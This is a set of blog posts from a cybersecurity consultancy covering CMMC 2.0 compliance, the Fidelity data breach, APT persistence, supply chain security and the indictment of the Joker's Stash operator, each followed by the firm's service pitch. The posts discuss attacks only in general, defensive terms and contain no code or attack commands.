    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. As part of our commitment to supporting businesses in their compliance journey, we offer CMMC (Cybersecurity Maturity Model Certification) preparation services. Our team assists organizations in understanding the CMMC requirements and developing the necessary controls to meet compliance standards, ensuring they are well-prepared for CMMC assessments.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact

  • Netizen: Monday Security Brief (10/14/2024)

    Netizen: Monday Security Brief (10/14/2024)

    Today’s Topics:

    • DoD Finalizes CMMC 2.0 Rule: What Contractors Need to Know for 2025 Compliance
    • 77,000 Customers Impacted in Fidelity Investments Data Breach
    • How can Netizen help?

    DoD Finalizes CMMC 2.0 Rule: What Contractors Need to Know for 2025 Compliance

    The Department of Defense (DoD) has taken a significant step toward rolling out its updated Cybersecurity Maturity Model Certification (CMMC) 2.0 by releasing the final rule. The rule is now available for public review on the Federal Register, with the official publication expected on October 15. This move sets the stage for full implementation of CMMC 2.0 by mid-2025, according to the DoD’s recent announcement.

    CMMC 2.0 is designed to help safeguard sensitive government information—like controlled unclassified information (CUI) or federal contract information (FCI)—on contractor systems. The model introduces tiered levels of cybersecurity compliance based on the nature of the data a contractor handles. The goal is to protect DoD data from being exploited by adversaries while streamlining the process, especially for smaller contractors. CMMC 2.0 reduces the compliance levels from five to three to make it easier for companies to meet these new standards.

    This effort is the culmination of several years of work. It began during the previous administration when the initial framework was developed. In December 2023, the DoD kickstarted the federal rulemaking process for CMMC 2.0 by publishing a proposed rule. This was followed in August 2024 by another proposal to update the Defense Federal Acquisition Regulation Supplement (DFARS), which will make cybersecurity a key factor in future Pentagon contracts.

    The plan is for these DFARS updates to be finalized and implemented by mid-2025. At that point, CMMC compliance will be a requirement in DoD contracts. Contractors that handle CUI or FCI must meet the appropriate cybersecurity level to secure contract awards.

    For companies dealing with less sensitive data, the DoD has built in flexibility, allowing them to conduct self-assessments of their cybersecurity practices. However, those handling more critical information will be required to undergo third-party assessments or assessments led by the Defense Industrial Base Cybersecurity Assessment Center to verify their compliance.

    The CMMC initiative hasn’t been without criticism. Many in the defense industry, particularly small businesses, have expressed concerns over the cost and complexity of meeting these new requirements. In response, the DoD has committed to providing resources to help contractors navigate the process.

    One important feature of CMMC 2.0 is the introduction of “Plans of Action and Milestones” (POA&Ms). This allows contractors who haven’t yet met all the required cybersecurity standards to receive a provisional certification for 180 days, giving them time to reach full compliance without losing out on contract opportunities.

    The DoD recognizes that meeting these new cybersecurity requirements will take time and effort, but it’s urging businesses in the defense sector to begin assessing their current security practices and start preparing for the upcoming CMMC assessments.

    To read more about this article, click here.

    77,000 Customers Impacted in Fidelity Investments Data Breach

    Fidelity Investments is alerting tens of thousands of individuals that their personal information was compromised in a recent data breach. The financial services company reported that unauthorized activity occurred between August 17 and 19, leading to the exposure of sensitive customer information.

    According to reports filed with attorney generals in various states, the attacker created two fraudulent customer accounts. These accounts were then used to access and retrieve images of documents containing personal details from an internal Fidelity database. The breach was identified and contained on August 19, after which Fidelity acted quickly to shut down the unauthorized access.

    While Fidelity has indicated that the breach impacted only a “small subset” of customers, it reported to Maine’s Attorney General that over 77,000 individuals were affected. Compromised information includes names, Social Security numbers, financial account details, and driver’s license data. However, the company assured that no customer accounts or funds were jeopardized.

    In response, Fidelity is offering those impacted two years of free credit monitoring and identity restoration services. This breach marks the second significant security incident the company has disclosed in 2024. Earlier this year, roughly 30,000 individuals were notified of a separate data breach involving a third-party service provider, Infosys McCamish System (IMS).

    Fidelity Investments, which manages $14 trillion in assets and serves over 51 million individual investors, continues to take steps to address these security challenges and safeguard customer information.

    To read more about this article, click here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • What Is Persistence in Cybersecurity and How Do You Stop an Advanced Persistent Threat (APT)?

    What Is Persistence in Cybersecurity and How Do You Stop an Advanced Persistent Threat (APT)?

    An advanced persistent threat (APT), also known as persistence, is a type of cyberattack where an attacker gains long-term, undetected access to a system. Unlike short-term attacks like phishing or malware campaigns, APTs are designed to remain hidden for extended periods, often months or years, allowing the attacker to maintain control without disruption, even after system reboots, credential changes, or other security measures.

    This blog will discuss the impacts of APTs, how persistence methods work, and the various ways attackers achieve and maintain access within a network.

    ATA vs. APT: What’s the Difference?

    The terms Advanced Targeted Attack (ATA) and Advanced Persistent Threat (APT) are sometimes used interchangeably, but they refer to different aspects of an attack. ATAs are specific methodologies used by APT groups—such as “Fancy Bear” or “Lazarus”—to gain Advanced Persistent Access. While the tactics may vary across different APT groups, the goal is consistent: establishing a long-term presence within a target’s environment. ATAs are the toolset, while APTs describe the sustained control attackers maintain.

    How Do APTs Remain Hidden for So Long?

    One of the most significant challenges in addressing APTs is their ability to remain undetected. Many organizations, especially SMBs, lack the monitoring and detection capabilities needed to identify APTs in their networks. According to the FBI and the IBM 2022 Data Breach Investigation Report, persistence attackers often go unnoticed for an average of 200 days. During this time, attackers can establish multiple user accounts, gain remote access to key systems, and even control servers—all without triggering security alerts.

    Additionally, threat actors may create diversionary tactics, such as launching a DDoS attack, to mislead security professionals, while their primary attack, the APT, continues undetected. Such tactics allow them to focus on higher-value targets while the organization scrambles to address the decoy attack.

    Key Risks Posed by Advanced Persistent Threats

    APTs pose a wide array of risks, as attackers can exploit their access for multiple malicious purposes. These include:

    • Infiltrating the victim’s supply chain, targeting partners, vendors, or customers.
    • Cyber espionage, often driven by nation-states looking to compromise government agencies or critical infrastructure.
    • Cybersecurity reconnaissance, allowing attackers to observe weaknesses in an organization’s defenses or identify users susceptible to phishing.
    • Initiating watering-hole attacks, in which attackers compromise websites frequently visited by their targets.
    • Exfiltrating data without detection, leveraging the long-term access to avoid raising red flags.
    • Intellectual property theft, particularly sensitive in industries like technology, defense, or pharmaceuticals.
    • Slowly leaking sensitive data, evading detection by blending in with normal network activity.

    How Does the Persistence Method Work?

    Hackers use a variety of techniques to maintain their foothold within a compromised network, including:

    • Windows Services: Manipulating legitimate services to avoid detection.
    • Misconfigurations: Exploiting improperly configured security settings.
    • Custom Malware: Developing undetectable malware or leveraging zero-day exploits to bypass security.
    • Domain-based Persistence: Attackers may compromise a domain controller or other key servers within a network, giving them persistent access to all connected systems.

    Attackers also take advantage of multi-stage operations to establish a foothold. After initial access—often through phishing, social engineering, or exploiting known vulnerabilities—they install malware like backdoors or rootkits. These tools allow them to maintain access while remaining hidden from most monitoring systems.

    They also use privilege escalation techniques, gradually gaining more control over the system by exploiting software vulnerabilities or using stolen credentials. By obtaining administrative privileges, attackers can move laterally through a network, exfiltrating data or preparing the system for larger attacks without detection.

    Case Studies: Learning from Real-World APT Incidents

    Examining real-world case studies of Advanced Persistent Threat incidents can provide invaluable insights into the tactics and strategies used by attackers. For instance, the SolarWinds breach, where attackers exploited vulnerabilities in software updates to infiltrate thousands of organizations, serves as a cautionary tale about the risks associated with third-party vendors. By studying such incidents, organizations can identify gaps in their security posture and develop targeted strategies to address them. Analyzing the timeline of an attack, the methods of exploitation, and the subsequent response can offer lessons on improving detection capabilities and refining incident response protocols, ultimately leading to a stronger defense against future APTs.

    Countermeasures Against APTs

    Stopping an APT requires a combination of proactive defense strategies and comprehensive detection systems. To protect against these threats, organizations should focus on the following measures:

    • Advanced Threat Detection: Implementing sophisticated detection systems like Intrusion Detection Systems (IDS), Security Information and Event Management (SIEM) tools, and endpoint detection and response (EDR) platforms. These solutions help monitor for unusual activity, such as unauthorized access attempts or irregular data transfers.
    • Network Segmentation: Limiting access across different areas of your network can reduce the potential damage of an APT. If an attacker gains access to one segment, network segmentation ensures they cannot move freely across the entire infrastructure.
    • Regular Patching: Keeping software and systems up-to-date by applying security patches as soon as vulnerabilities are disclosed. Attackers often exploit known vulnerabilities, so staying current on updates is one of the simplest but most effective defenses.
    • User Awareness Training: Educating employees about phishing attacks and other social engineering methods can significantly reduce the chances of attackers gaining an initial foothold in the network.
    • Multi-Factor Authentication (MFA): Requiring MFA for all critical systems can make it more difficult for attackers to use stolen credentials to gain access.
    • Incident Response Planning: Having a well-defined incident response plan ensures that if an APT is detected, your organization can act quickly to contain and eliminate the threat. Regularly testing and updating this plan is crucial.
    • Continuous Monitoring: Automated tools that provide continuous system scanning and monitoring, like Netizen’s offerings, are essential for detecting APTs early. By continuously assessing the network for vulnerabilities, misconfigurations, and suspicious activity, businesses can catch attacks before they escalate.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. As part of our commitment to supporting businesses in their compliance journey, we offer CMMC (Cybersecurity Maturity Model Certification) preparation services. Our team assists organizations in understanding the CMMC requirements and developing the necessary controls to meet compliance standards, ensuring they are well-prepared for CMMC assessments.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact

  • Strengthening Supply Chain Security: Closing the Gaps Before Attackers Find Them

    Strengthening Supply Chain Security: Closing the Gaps Before Attackers Find Them

    As organizations have reinforced their defenses against direct attacks, hackers have increasingly turned their attention to the supply chain, exploiting vulnerabilities in third-party systems to gain access to larger networks. These backdoor supply chain attacks have led to significant security breaches in recent years, putting businesses and their data at serious risk.

    A growing number of these incidents involve vulnerabilities in commonly-used IT and security tools. One recent example involves Ivanti enterprise VPNs, where attackers took advantage of a zero-day flaw to deploy a backdoor called ‘DSLog’. Similarly, a remote code execution vulnerability in TeamCity was exploited—likely by the APT29 group—using PowerShell scripts to install malicious certificates and download malware. The popular file transfer tool GoAnywhere MFT also became a target for ransomware groups like LockBit and Cl0p, who used it to execute remote code, causing major disruptions, particularly in healthcare.

    These examples make it clear that weaknesses in widely-used management tools are prime targets for both state-sponsored actors and ransomware groups. Protecting against such supply chain cyberattacks is more crucial than ever.

    Supply Chain Attacks Aren’t New

    While supply chain attacks have recently made headlines, they’ve been a favorite tactic of cybercriminals for years. Hackers have repeatedly exploited security gaps in third-party providers and vendors to compromise larger organizations. The infamous SolarWinds Orion attack and the breach involving VMware Workspace ONE are prime examples of successful supply chain intrusions.

    One of the most notorious supply chain attacks remains the RSA SecurID token breach. In that case, attackers leveraged stolen information to infiltrate RSA’s authentication system, ultimately compromising high-profile customers like Lockheed Martin.

    Addressing Supply Chain Security Risks

    Failures in third-party systems can result in not only data loss but also severe operational and reputational damage. Basic vendor management is no longer enough—companies need to actively safeguard against third-party control failures. Here are some key strategies to consider:

    1. Implement Advanced Supplier Risk Management

    Ensure that every vendor or supplier follows strict cybersecurity protocols. This includes assessing their compliance with relevant standards such as ISO 27001, NIST, or GDPR. Vendors should be evaluated based on the sensitivity of the data they handle and the criticality of their services. You may also want to require independent security testing of software applications before deployment.

    2. Secure the Software Development Pipeline

    Protect access to the tools and applications used by DevOps teams. This includes ensuring secure configuration via secrets and authenticating applications with a high degree of confidence. It’s also essential to require that software providers extend security measures to cover microservices, cloud infrastructure, and DevOps environments.

    3. Keep Systems and Software Updated

    Regularly update and patch your systems and those of your suppliers. Unsupported or outdated software introduces vulnerabilities that attackers can easily exploit. Keeping everything current is a simple yet effective way to reduce risks.

    4. Harden Your Environment

    When working in cloud environments, reject authorization requests that don’t meet accepted security norms. For on-premises systems, use Federal Information Processing Standards (FIPS)-validated Hardware Security Modules (HSMs) to protect token-signing certificates and private keys. HSMs help reduce the risk of key theft by malicious actors.

    5. Strengthen Access Controls

    Limit vendor access to only the systems and data necessary for their operations. Multi-factor authentication should be mandatory for third-party access to your systems. A Zero Trust approach can further enhance security by requiring continuous verification of all users before access is granted.

    6. Use Security Tools and Technologies

    Segment your network to prevent lateral movement if one section is breached. Tools like Endpoint Detection and Response (EDR) solutions can help identify malicious activities on devices connected via third parties. Encrypting sensitive data—both at rest and in transit—will also minimize the damage in the event of a breach.

    7. Adopt Cybersecurity Frameworks and Best Practices

    Implement frameworks like the NIST cybersecurity framework to identify, protect, detect, and respond to cyber threats. Consider adopting supply chain-specific frameworks, such as ISO 28001 or the Shared Assessments Standardized Information Gathering (SIG), to better manage supply chain risks.

    8. Incorporate Cybersecurity in Contracts

    Make sure vendor contracts include clear cybersecurity requirements, including mandatory security controls, data protection measures, and breach notification procedures. For high-risk vendors, consider requiring third-party audits or independent security assessments to verify their security posture.

    Why Supply Chain Security Matters

    Supply chain attacks are not a new phenomenon, with past breaches such as the SolarWinds Orion and RSA SecurID token attacks serving as early warnings of the risks. These incidents caused substantial harm by exploiting third-party systems to gain access to high-value targets. Today, protecting against these threats is more essential than ever, requiring businesses to go beyond basic vendor management practices. Implementing advanced risk management strategies, securing development pipelines, keeping systems updated, and hardening network environments are crucial steps. Additionally, strengthening access controls, adopting cybersecurity frameworks, and incorporating security requirements into vendor contracts can significantly reduce risks.

    Netizen helps businesses stay ahead of these threats by offering comprehensive solutions like CISO-as-a-Service, vulnerability assessments, and continuous monitoring through automated assessment tools. Our services are designed to secure the entire IT infrastructure, ensuring that businesses are protected from the growing threat of supply chain cyberattacks.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact

  • Joker’s Stash Busted: Russian Hackers Indicted in Massive Financial Cybercrime Operation

    Joker’s Stash Busted: Russian Hackers Indicted in Massive Financial Cybercrime Operation

    The U.S. Department of Justice (DOJ), on September 26th, has announced significant legal actions targeting two prominent Russian cybercriminals. The individuals involved—Timur Kamilevich Shakhmametov, allegedly behind the notorious carding platform Joker’s Stash, and a top Russian cybercriminal known as “Taleon”—have both been indicted and sanctioned. These individuals are accused of facilitating some of the largest financial cybercrimes of the past decade.

    Joker’s Stash: A Billion-Dollar Carding Empire

    Shakhmametov, a 38-year-old from Novosibirsk, Russia, is charged with operating Joker’s Stash, a once-popular underground marketplace for stolen credit card data. The DOJ alleges that Shakhmametov—using the alias “Vega”—sold millions of payment cards obtained from high-profile data breaches at retailers like Saks Fifth Avenue, Hilton Hotels, Chipotle, and Sonic Drive-In, among others. Joker’s Stash was a major player in the world of carding, operating from late 2014 until its closure in 2021.

    What set Joker’s Stash apart from other carding platforms was its focus on high-volume buyers, such as street gangs in the U.S., and its innovative business model. The platform offered loyalty programs, money-back guarantees, and exclusive access to the freshest stolen cards. It also claimed to sell only cards stolen directly by its own hackers, unlike competitors who sourced from third-party criminals.

    Joker’s Stash reportedly earned revenues ranging from $280 million to over $1 billion. The broad range is attributed to variables like the fluctuating value of cryptocurrencies and the sale price of stolen goods. Despite its closure in early 2021, following a series of European law enforcement actions and the site operator contracting COVID-19, Joker’s Stash remains one of the most infamous cybercrime platforms in recent memory.

    Taleon: The Mastermind Behind Russia’s Money Laundering Network

    While Joker’s Stash was highly profitable, Taleon’s ventures may have had an even greater financial impact. Taleon, whose real name remains undisclosed, allegedly operates Cryptex, a cryptocurrency exchange that has become one of Russia’s largest money laundering hubs. Cryptex is accused of moving billions of dollars in illicit funds, providing a crucial infrastructure for cybercriminals seeking to launder money from stolen payment cards and ransomware payouts.

    Taleon is described as a key facilitator for Russian cybercriminal organizations, offering financial services that allow them to cash out their illicit earnings. By running Cryptex and other financial networks, Taleon helped convert cryptocurrency into traditional currency, enabling hackers to profit from their crimes with minimal risk of detection.

    Coordinated International Effort

    The DOJ’s indictment of Shakhmametov and Taleon is part of a broader international effort to curb cybercrime. In addition to the indictments, the U.S. has imposed sanctions on both individuals, effectively cutting them off from the global financial system. The U.S. Treasury Department has also sanctioned Cryptex, targeting the platform’s operations and preventing its use for further money laundering.

    The U.S. Secret Service, which led the investigation into Joker’s Stash, has played a critical role in both operations. This agency, originally founded to combat counterfeiting, has adapted its mission over the years to address the growing threat of financial cybercrime. The DOJ credits their expertise in tracking illicit financial activity as instrumental in bringing these cybercriminals to justice.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact